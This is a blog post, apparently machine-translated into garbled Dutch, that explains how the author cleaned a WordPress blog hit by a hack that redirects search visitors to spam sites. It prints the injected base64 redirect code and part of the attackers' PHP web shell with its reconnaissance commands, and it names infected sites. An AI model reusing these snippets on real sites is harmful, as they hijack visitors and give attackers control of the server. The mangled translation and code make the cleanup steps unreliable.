Blogosphere virus ... maar wat je me hebt aangedaan?

In de afgelopen maand heb ik ontvangen waarschuwingen virus in blog van sommige bezoekers. Aanvankelijk heb ik negeerde de waarschuwingen, omdat ik installeerde een vrij goede antivirus (Kaspersky AV 2009) En zelfs blog voor een lange tijd, ik heb nooit een virus alert (lang geleden .. zag ik iets vermoeden dat de eerste refresh verdwenen. Eindelijk ...).
Langzaam begon tot grote variaties zien bezoekersverkeerNa die onlangs gedaald gestaag verkeer en begon te worden meer en meer mensen vertellen me dat stealthsettings.com het virused. Gisteren kreeg ik van iemand een screenshot gedaan wanneer antivirus geblokkeerd een script op stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Het was behoorlijk overtuigend voor mij, dus ik alle bronnen doorzocht zetten. Het eerste idee dat bij me opkwam was te doen upgrade de laatste WordPress (2.5.1), maar niet voordat de oude script om alle bestanden van WordPress wilt verwijderen en back-up database. Deze procedure is in het ongelijk gesteld en zou waarschijnlijk een lange tijd te achterhalen sema waar de kook, als ik zou hebben gezegd hebben genomen in een discussie over koffie, vond hij Google en het zou goed zijn om hem te zien.
MyDigitalLife.info heeft een artikel gepubliceerd met de titel "WordPress Hack: Herstellen en Fix Google en Search Engine of Nee Cookie Verkeer doorgestuurd naar Your-Needs.info, AnyResults.Net, Golden-Info.net en andere illegale sites"Dat is het einde van de draad die ik nodig had.
Het gaat over een exploiteren WordPress op basis van cookiesWaarvan ik denk dat is zeer complex en maakte het boek. Slim genoeg om een ​​te maken SQL Injection Database blog, naar een onzichtbare gebruiker te maken een eenvoudige routine controle Dashboard->Gebruikers, Controleer de server mappen en bestanden "schrijfbaar" (Met chmod 777), te zoeken en te uitvoeren bestanden met de privileges van de groep of de wortel. Ik weet niet wie gebruik maken van de naam en het zien dat er enkele artikelen geschreven over hem, ondanks het feit dat veel blogs zijn geïnfecteerd, waaronder Roemenië. Ok ... Ik zal proberen om te proberen om algemeenheden over het virus uit te leggen.

Wat is virus?

Plaats eerst de bronnen pagina's op blogs, links onzichtbaar voor bezoekers, maar zichtbaar en indexeerbaar voor zoekmachines, met name Google. Op deze manier overdracht Page Rank plaatsen aangeduid door de aanvaller. Ten tweede wordt er een ingevoegd omleiding code URL voor bezoekers uit Google, Live, Yahoo, ... of een RSS-lezer en niet de site in koekje. Een antivirus detecteert de redirect als Trojan-Clicker.HTML.

Symptomen:

Verminderde enorme bezoekersverkeerVooral op blogs waar de meeste bezoekers vandaan komen Google.

Identificatie: (Vandaar compliceren het probleem voor degenen die niet weten hoe hoe phpmyadmin, php en linux)

LA. WAARSCHUWING! Maak eerst een back-up database!

1. Controleer de bronbestanden index.php, header.php, footer.php, Het thema van de blog en kijk of er een code die gebruikmaakt van codering base64 of bevat "if ($ ser ==" 1 && sizeof ($ _COOKIE) == 0?) "vorm:

$ Seref = array ("google", "msn", "leven", "altavista"
"Vraag", "yahoo", "AOL", "cnn", "weer", "alexa");
$ Ser = 0; foreach ($ Seref als $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ verw) == false) {$ ser = "1;? Break;}!
if ($ ser == "1 sizeof (&& $ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); exit;
}?>

... Of zoiets. Verwijder deze code!

Klik op de foto ...

code index

In de afbeelding hierboven ik per ongeluk gekozen voor de "<Php get_header ();?>". Die code moet blijven.

2. Gebruiken phpMyAdmin en ga naar de database tabel wp_usersWaar controleren of er geen gebruikersnaam gemaakt op 00:00:00 0000-00-00 (Mogelijk in veld USER_LOGIN schrijven "WordPress". Let op de gebruikers-ID (veld ID) en verwijder het.

Klik op de foto ...

nep-gebruiker

* De groene lijn moet worden verwijderd en behield zijn ID. Bij Was ID = 8 .

3. Ga naar de tabel wp_usermeta, Waar je gelegen en verwijderen lijnen ID (waar het veld user_id ID-waarde wordt verwijderd).

4. In Tabel wp_option, Go active_plugins en zie wat plug-in is verdachte ingeschakeld. Het kan gebruikt worden als eindes _old.giff, _old.pngg, _old.jpeg, _new.php.giff, enz. combinaties van nep-beelduitbreidingen met _oud en _nieuw.

WAAR SELECT * FROM wp_options option_name = 'active_plugins'

Verwijder dit plugin, ga dan naar de blog -> Dashboard -> Plugins en activeer een plugin die uit te schakelen zeker.

Klik op de afbeelding om te zien lijkt het erop active_plugins virus bestand.

inpluggen

Volg het pad op de FTP of SSH, aangegeven in active_plugins en verwijder het bestand van de server.

5. Ook in phpMyAdmin in tabel wp_option, Zoek en verwijder de regel met "rss_f541b3abd05e7962fcab37737f40fad8'En'internal_links_cache ".
In internal_links_cache, aangeboden versleutelde spam links die worden weergegeven in een blog Google Adsense code, De hacker.

6. Wordt aanbevolen wachtwoord wijzigen Blog en login verwijder alle verdachte userele. Upgrade naar de nieuwste versie van WordPress en de blog niet de inschrijving van nieuwe gebruikers in te stellen. Er is geen verlies ... kunnen reageren en onlogisch.

Ik probeerde boven enigszins, wat te doen in een dergelijke situatie uit te leggen, om schoon te bloggen dit virus. Het probleem is ernstiger dan het lijkt en verre van opgelost, voor gebruik beveiligingsproblemen het hosten van de webserver, die blog.

Als eerste maatregel van veiligheid, met toegang SSH, Maak een aantal controles op de server om te zien of er bestanden zoals * _old * en * _Nieuw. * Met eindes.Giff,. jpeg,. pngg,. jpgg. Deze bestanden moeten worden verwijderd. Als u de naam van een bestand, bijvoorbeeld. top_right_old.giff in top_right_old.phpWe zien dat het bestand is precies de exploit code-server.

Enkele handige tips voor het controleren, opschonen en beveiligen van de server. (via SSH)

1. cd / tmp en controleer of er mappen, zoals tmpVFlma of verwijderen andere combinaties asemenatoare naam en het. Zie de screenshot hieronder, twee van dergelijke mappen voor mij:

tmpserver

rm-rf mapnaam

2. Controleer elimiati (veranderende chmod-mail) mappen met attributen als mogelijk chmod 777

vind alle schrijfbare bestanden in de huidige dir: Zoeken. -Type f-perm-2-ls
vind alle schrijfbare mappen in de huidige dir: Zoeken. -Type d-perm-2-ls
vind alle schrijfbare mappen en bestanden in de huidige dir: Zoeken. -Perm-2-ls

3. Op zoek naar verdachte bestanden op de server.

Zoeken. -Naam "* _new.php *"
Zoeken. -Naam "* _old.php *"
vinden. -name '* .jpgg "
vinden. -name '* _giff "
vinden. -name '* _pngg "

4, WAARSCHUWING! de bestanden die zijn ingesteld beetje SUID si SGID. Deze bestanden uit te voeren met de bevoegdheden van de gebruiker (groep) of wortel, niet de gebruiker die het bestand uit te voeren. Deze bestanden kunnen leiden tot wortel compromis, als veiligheidsvraagstukken. Als je niet de SUID en SGID bestanden te gebruiken met bits, uit te voeren 'chmod 0 " hen of verwijderen pakket die ze bevatten.

Wordt misbruikt ergens in de bron ...:

if (! $ safe_mode) {
if ($ os_type == 'nix') {
$ Os = Uitvoeren ("sysctl-n kern.ostype ').;
$ Os = Uitvoeren ("sysctl-n kern.osrelease ').;
$ Os = Uitvoeren ("sysctl-n kernel.ostype ').;
$ Os = Uitvoeren ("sysctl-n kernel.osrelease ').;
if (empty ($ user)) $ user = execute ('id');
$ Aliassen = array (
"=>"
"Vind suid bestanden '=>' find /-type f-perm-04000-ls ',
'Zoek sgid files' => 'find /-type f-perm-02000-ls',
'Zoek alle schrijfbare bestanden in de huidige dir' => 'te vinden. -Type f-perm-2-ls ',
'Zoek alle schrijfbare mappen in de huidige dir' => 'te vinden. -Type d-perm-2-ls ',
'Zoek alle schrijfbare mappen en bestanden in de huidige dir' => 'te vinden. -Perm-2-ls ',
'Toon open poorten' => 'netstat-an | grep-i luisteren',
);
Else {}
. $ Naam besturingssysteem = Uitvoeren ('ver');
$ Gebruiker = Uitvoeren ("echo% username% ').;
$ Aliassen = array (
"=>"
"Toon runing diensten '=>' net start '
'Toon lijst met processen' => 'tasklist'
);
}

Vindt op die manier ... in principe inbreuken op de beveiliging. Poorten openen directory "schrijfbaar" en de groep uitvoering privileges bestanden / root.

Terug met meer ...

Besmet sommige blogs: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... De lijst gaat maar door ... veel.

U kunt controleren of een blog is het virus met Google-zoekmachine. kopiëren en plakken:

Site: www.blegoo.com kopen

Goedenacht en verhoog tot ;) werken Binnenkort kom ik naar Eugene nieuws op prevezibil.imprevizibil.com.

brb :)

OM: LET OP! WordPress thema wijziging of upgrade naar WordPress 2.5.1, geen oplossing om zich te ontdoen van dit virus.

Blogosphere virus ... maar wat je me hebt aangedaan?

Over de auteur

heimelijkheid

Gepassioneerd door alles wat gadget en IT betekent, schrijf ik graag op stealthsettings.com van 2006 en ontdek ik graag nieuwe dingen over computers en macOS, Linux-besturingssystemen, Windows, iOS en Android.

Laat een bericht achter